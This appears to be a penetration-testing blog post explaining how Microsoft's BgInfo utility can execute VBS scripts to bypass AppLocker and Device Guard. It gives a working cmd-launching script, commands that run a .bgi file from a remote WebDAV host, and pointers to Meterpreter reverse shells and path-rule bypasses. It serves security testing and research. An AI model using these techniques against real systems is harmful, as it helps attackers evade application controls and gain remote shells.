BgInfo is a Microsoft utility that displays automatically system information about the computer directly in the desktop background. It is one of the utilities that system administrators use very often and it can be found in some systems.
Oddvar Moe discovered that BgInfo can be utilized to bypass AppLocker and Device Guard restrictions since it has the ability to execute VBS scripts. As a proof of concept he wrote a simple script that can call and execute command prompt.
strProgram = "cmd.exe" strPath = "C:\windows\system32" Set fso = CreateObject("Scripting.FileSystemObject") strCommand = fso.BuildPath(strPath, strProgram) Set app = CreateObject("Shell.Application") app.ShellExecute strCommand, , strPath, , 1 echo "pentestlab"
From BgInfo a custom field needs to be added that it will point to the cmd.vbs script.
From the moment that the OK button is pressed the VBS code will be executed and a command prompt will open.
Generating BGI Files
The BgInfo configuration can be saved as .bgi which means that the cmd.vbs can executed automatically without creating a new custom field every time that BgInfo is running.
The following powershell script will generate a BGI file which will contain the path that the cmd.vbs is located. However instead of cmd.vbs it can be any script.
From the moment that the BGI file will executed the cmd.vbs will run and a command prompt will be opened.
Alternatively the .BGI file can be executed via Run or remotely from a WebDAV server.
C:\BgInfo\Bginfo.exe test1.bgi /popup /nolicprompt “\\10.10.10.10\webdav\bginfo.exe” bginfo.bgi /popup /nolicprompt
Based on the work that Cneeliz did with weaponized VBS scripts that contain Metasploit payloads it is possible to utilize them in order to get a reverse Meterpreter shell through BgInfo utility.
It is also possible in an environment that the command prompt is locked by a deny rule to still run a command prompt by exploiting weak path rules and modifying the script properly to execute Didier Stevens version of CMD.
The first two lines of the cmd.vbs script need to be modified in order to execute the binary in a location that a user has read and write access by default.
As a result the command prompt will opened bypassing the AppLocker rule.
Thank you very much for all of this information keep on doing that!~